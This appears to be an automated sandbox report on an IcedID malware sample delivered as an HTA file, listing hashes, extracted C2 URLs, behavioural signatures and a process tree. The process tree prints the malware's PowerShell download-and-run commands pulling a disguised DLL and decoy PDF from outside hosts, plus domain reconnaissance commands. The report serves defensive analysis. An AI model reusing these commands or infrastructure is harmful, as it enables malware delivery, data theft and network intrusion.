Analysis
-
max time kernel
145s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
04-02-2023 22:06
Static task
static1
Behavioral task
behavioral1
Sample
2.hta
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2.hta
Resource
win10v2004-20221111-en
General
-
Target
2.hta
-
Size
1KB
-
MD5
78b6f14f36098c269c3d03a29eb35bc8
-
SHA1
afd76bfe0d6ac105730b218152d0a650b6a869b7
-
SHA256
c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
-
SHA512
57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712
Malware Config
Extracted
http://helthbrotthersg.com/view.png
Extracted
https://transfer.sh/get/vpiHmi/invoice.pdf
Extracted
icedid
3954321778
ehonlionetodo.com
Signatures
-
Blocklisted process makes network request 10 IoCs
Processes:
mshta.exepowershell.exepowershell.exerundll32.exeflow pid process 6 1648 mshta.exe 8 1648 mshta.exe 18 212 powershell.exe 20 3644 powershell.exe 52 1608 rundll32.exe 61 1608 rundll32.exe 62 1608 rundll32.exe 63 1608 rundll32.exe 65 1608 rundll32.exe 68 1608 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exepid process 3644 rundll32.exe 1608 rundll32.exe 1608 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1884 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exerundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9}\ = 8e11aadfb83d92512e782a3f6b8a29b0794bd1622b2afd06531b56d389506774982cca77dae674020def0755ad1daf897afb33ae1a3d073bc692eca01adde7ed97d412319f27f3680743d3139d71309686aa4f63389b552442df4c34ec65552afd9e5b360e0300962d23cacf9386172a8ee4956d5967a0db0f7c6b56cadb43320ac11b7ca94ba23420d80d5942c919e675b00f2da58825970ed19938b7eb9d3bc8928675130d25de0857dc096e3c5dcc992f5f4ea792a5c814ef6969c98d3fcbedfe264fd665accee1d4ac8a98b305535dd81327ba9e20144c30c897fb453c rundll32.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exepowershell.exeAcroRd32.exerundll32.exepid process 3644 powershell.exe 212 powershell.exe 3644 powershell.exe 212 powershell.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 1608 rundll32.exe 1608 rundll32.exe 1608 rundll32.exe 1608 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 212 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 2928 WMIC.exe Token: SeSecurityPrivilege 2928 WMIC.exe Token: SeTakeOwnershipPrivilege 2928 WMIC.exe Token: SeLoadDriverPrivilege 2928 WMIC.exe Token: SeSystemProfilePrivilege 2928 WMIC.exe Token: SeSystemtimePrivilege 2928 WMIC.exe Token: SeProfSingleProcessPrivilege 2928 WMIC.exe Token: SeIncBasePriorityPrivilege 2928 WMIC.exe Token: SeCreatePagefilePrivilege 2928 WMIC.exe Token: SeBackupPrivilege 2928 WMIC.exe Token: SeRestorePrivilege 2928 WMIC.exe Token: SeShutdownPrivilege 2928 WMIC.exe Token: SeDebugPrivilege 2928 WMIC.exe Token: SeSystemEnvironmentPrivilege 2928 WMIC.exe Token: SeRemoteShutdownPrivilege 2928 WMIC.exe Token: SeUndockPrivilege 2928 WMIC.exe Token: SeManageVolumePrivilege 2928 WMIC.exe Token: 33 2928 WMIC.exe Token: 34 2928 WMIC.exe Token: 35 2928 WMIC.exe Token: 36 2928 WMIC.exe Token: SeIncreaseQuotaPrivilege 2928 WMIC.exe Token: SeSecurityPrivilege 2928 WMIC.exe Token: SeTakeOwnershipPrivilege 2928 WMIC.exe Token: SeLoadDriverPrivilege 2928 WMIC.exe Token: SeSystemProfilePrivilege 2928 WMIC.exe Token: SeSystemtimePrivilege 2928 WMIC.exe Token: SeProfSingleProcessPrivilege 2928 WMIC.exe Token: SeIncBasePriorityPrivilege 2928 WMIC.exe Token: SeCreatePagefilePrivilege 2928 WMIC.exe Token: SeBackupPrivilege 2928 WMIC.exe Token: SeRestorePrivilege 2928 WMIC.exe Token: SeShutdownPrivilege 2928 WMIC.exe Token: SeDebugPrivilege 2928 WMIC.exe Token: SeSystemEnvironmentPrivilege 2928 WMIC.exe Token: SeRemoteShutdownPrivilege 2928 WMIC.exe Token: SeUndockPrivilege 2928 WMIC.exe Token: SeManageVolumePrivilege 2928 WMIC.exe Token: 33 2928 WMIC.exe Token: 34 2928 WMIC.exe Token: 35 2928 WMIC.exe Token: 36 2928 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 4924 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe 4924 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mshta.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 1648 wrote to memory of 212 1648 mshta.exe powershell.exe PID 1648 wrote to memory of 212 1648 mshta.exe powershell.exe PID 1648 wrote to memory of 212 1648 mshta.exe powershell.exe PID 1648 wrote to memory of 3644 1648 mshta.exe powershell.exe PID 1648 wrote to memory of 3644 1648 mshta.exe powershell.exe PID 1648 wrote to memory of 3644 1648 mshta.exe powershell.exe PID 3644 wrote to memory of 4924 3644 powershell.exe AcroRd32.exe PID 3644 wrote to memory of 4924 3644 powershell.exe AcroRd32.exe PID 3644 wrote to memory of 4924 3644 powershell.exe AcroRd32.exe PID 4924 wrote to memory of 2124 4924 AcroRd32.exe RdrCEF.exe PID 4924 wrote to memory of 2124 4924 AcroRd32.exe RdrCEF.exe PID 4924 wrote to memory of 2124 4924 AcroRd32.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1692 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe PID 2124 wrote to memory of 1952 2124 RdrCEF.exe RdrCEF.exe -
outlook_office_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe -
outlook_win_path 1 IoCs
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 rundll32.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\invoice.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F0CAFC6F08744F76686BF1AE0D8A9667 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9C6032725D176595BE55D04BFF5124A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9C6032725D176595BE55D04BFF5124A6 --renderer-client-id=4 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1E2D3BA7BF4B4722F27FD1E1C2C18A9B --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=39F80FA30618790DB44C61B523B1FED1 --mojo-platform-channel-handle=2696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=697FB9A370942C109905CCE604F16146 --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\cmd.execmd.exe /c chcp >&24⤵
-
C:\Windows\system32\chcp.comchcp5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\ipconfig.exeipconfig /all4⤵
- Gathers network information
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
-
C:\Windows\system32\net.exenet config workstation4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation5⤵
-
C:\Windows\system32\nltest.exenltest /domain_trusts4⤵
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts4⤵
-
C:\Windows\system32\net.exenet view /all /domain4⤵
- Discovers systems in the same network
-
C:\Windows\system32\net.exenet view /all4⤵
- Discovers systems in the same network
-
C:\Windows\system32\net.exenet group "Domain Admins" /domain4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 group "Domain Admins" /domain5⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD509b3d9d8c83b73e317cc6f184c13d636
SHA1ff9d02c9ca0333740b1e70bd430e502aa3df33f9
SHA256dfbac826c42a2010a04972a2e0f320bfe5181959591b3e100013160778a2d054
SHA5125204873bc7f7a912185099ade78c0d2621d3d4b1a827db49698f233291edfbb90c17af70ce6567774c281d5187da98cc8404e522ebd5e2649e6aa9a89ce281e2
-
C:\Users\Admin\AppData\Local\Temp\sqlite64.dllFilesize
1.8MB
MD526d773a69f6fad3200d49a7aaa77752b
SHA13970ffe8aefe0c30daaec65b85fb103c0fc0f2a7
SHA256fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5
SHA5120041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f
-
C:\Users\Public\classic.jpgFilesize
291KB
MD56b1e64957316e65198e3a1f747402bd6
SHA1f4df8c9d37a76eadf1125a74865032d83920123b
SHA256fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
SHA512dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff
-
C:\Users\Public\classic.jpgFilesize
291KB
MD56b1e64957316e65198e3a1f747402bd6
SHA1f4df8c9d37a76eadf1125a74865032d83920123b
SHA256fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe
